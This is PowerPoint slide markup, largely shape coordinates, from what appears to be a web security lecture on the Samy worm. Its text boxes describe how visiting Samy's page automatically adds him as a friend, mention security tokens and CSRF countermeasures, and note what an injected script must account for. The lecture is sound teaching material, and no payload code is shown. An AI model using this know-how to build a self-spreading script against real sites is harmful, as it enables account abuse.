                  <a:moveTo>
                    <a:pt x="41147" y="4127500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34416" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41491" y="4132413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41147" y="4127500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="18287" y="4114800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17652" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11175" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12064" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18287" y="4114800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="249301" y="2730500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199770" y="2730500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208787" y="3035300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209168" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208661" y="3721100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210819" y="3759200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212852" y="3797300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216281" y="3924300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217296" y="3949700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216915" y="3975100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211201" y="4038600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211455" y="4038600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207771" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208153" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195198" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195326" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190245" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242062" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242823" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243078" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256032" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256412" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260222" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260477" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266318" y="3975100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266699" y="3949700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265811" y="3911600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262382" y="3797300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260222" y="3759200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258698" y="3721100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258190" y="3721100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258698" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258317" y="3035300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249301" y="2730500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="22605" y="4102100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17145" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21462" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22605" y="4102100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="23313" y="4111264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21462" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22605" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23313" y="4111264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="28109" y="4102100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25145" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23313" y="4111264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28109" y="4102100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="90296" y="4089400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41656" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34543" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87757" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90296" y="4089400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="97155" y="4089400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90296" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87757" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95249" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97155" y="4089400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="102742" y="4076700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47243" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44704" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93344" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102742" y="4076700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="107822" y="4051300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106553" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108583" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106642" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102742" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93344" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100837" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106807" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108874" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107822" y="4051300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="56641" y="4064000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48006" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45465" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52069" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56641" y="4064000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="108600" y="4064000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56641" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52069" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106642" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108600" y="4064000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="61467" y="4051300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54737" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51308" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56007" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61467" y="4051300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="106553" y="4051300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61467" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56007" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108583" y="4064000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106553" y="4051300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="72388" y="4038600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70516" y="4038600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65266" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65405" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72388" y="4038600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="97393" y="4038600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72388" y="4038600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65405" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102681" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97393" y="4038600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="97409" y="4038600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="102681" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103913" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97409" y="4038600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="258216" y="3709034"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="258190" y="3721100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258698" y="3721100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258216" y="3709034"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="258217" y="3708400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="258216" y="3709034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258217" y="3708400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="203454" y="1828800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154051" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170307" y="2019300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170814" y="2044700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173862" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177418" y="2273300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183007" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188087" y="2489200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198882" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199897" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199770" y="2730500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249301" y="2730500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248285" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237616" y="2489200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232537" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226948" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220344" y="2044700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219710" y="2019300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203454" y="1828800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="148716" y="1358900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="99567" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125857" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142366" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153542" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203327" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202691" y="1816100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193094" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191515" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175006" y="1587500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148716" y="1358900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="191515" y="1727200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191515" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193094" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191515" y="1727200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="137921" y="1259204"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1270000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="1270000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90932" y="1308100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99567" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99567" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148716" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140081" y="1295400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140335" y="1295400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1259204"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="137160" y="1206500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87757" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88391" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88391" y="1270000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1270000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137160" y="1206500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="137921" y="1257300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1259204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137921" y="1257300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="123952" y="914400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74548" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70612" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74676" y="1130300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75057" y="1143000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81280" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81407" y="1181100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83819" y="1181100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87884" y="1219200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87757" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136906" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132841" y="1181100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129793" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130047" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123697" y="1130300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124079" y="1130300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120014" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123952" y="914400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="159765" y="584200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="110870" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100964" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82549" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79120" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76835" y="800100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75564" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74676" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124206" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125094" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126237" y="800100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="800100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128396" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131571" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149733" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159765" y="584200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="127253" y="800100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126237" y="800100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126111" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="800100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="166082" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120558" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118617" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118744" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122682" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123062" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122301" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118490" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114427" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113157" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110616" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159892" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162433" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163830" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167893" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171704" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172592" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171958" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168020" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168020" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166082" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="152965" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="133727" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125856" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160797" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152965" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E71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9FC4F022-266D-2657-B0E8-9EF39BA7FE2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8458200" y="2784348"/>
              <a:ext cx="3095625" cy="1755775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3095625" h="1755775">
                  <a:moveTo>
                    <a:pt x="0" y="1755647"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3095244" y="1755647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3095244" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1755647"/>
                  </a:ln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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6BB681F-4BB6-849E-DB25-9FB1FBFFCE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8537846" y="2808541"/>
            <a:ext cx="25025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66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 has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three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headers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tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>1.	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friend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endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3429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added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(Boby=57)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6D2865A-57FE-8F22-3822-CE18B7301ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8550909" y="3910076"/>
            <a:ext cx="18027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42265" algn="l"/>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Security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token</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Security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token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33DFD118-36B1-3FB9-28BA-10748373EA0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10762488" y="3994784"/>
            <a:ext cx="712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Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>un</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>ea</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>ure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>s  for CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>(not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> covered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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="700" spc="-2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this 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class)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BC0C5-BE16-328C-14EF-ABD928772EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611111" y="6606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Someone visits Samy’s page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> They automatically add Samy as a friend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F26C6B-5D79-999F-6FC7-D98AE4225A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8939974" y="4642809"/>
            <a:ext cx="288969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the script that we inject, we must account for these three things!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884889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42" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB2E822-C141-18AA-BD42-66B9DA40E334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6350" y="3933825"/>
            <a:ext cx="12204700" cy="2952750"/>
            <a:chOff x="-6350" y="3933825"/>
            <a:chExt cx="12204700" cy="2952750"/>
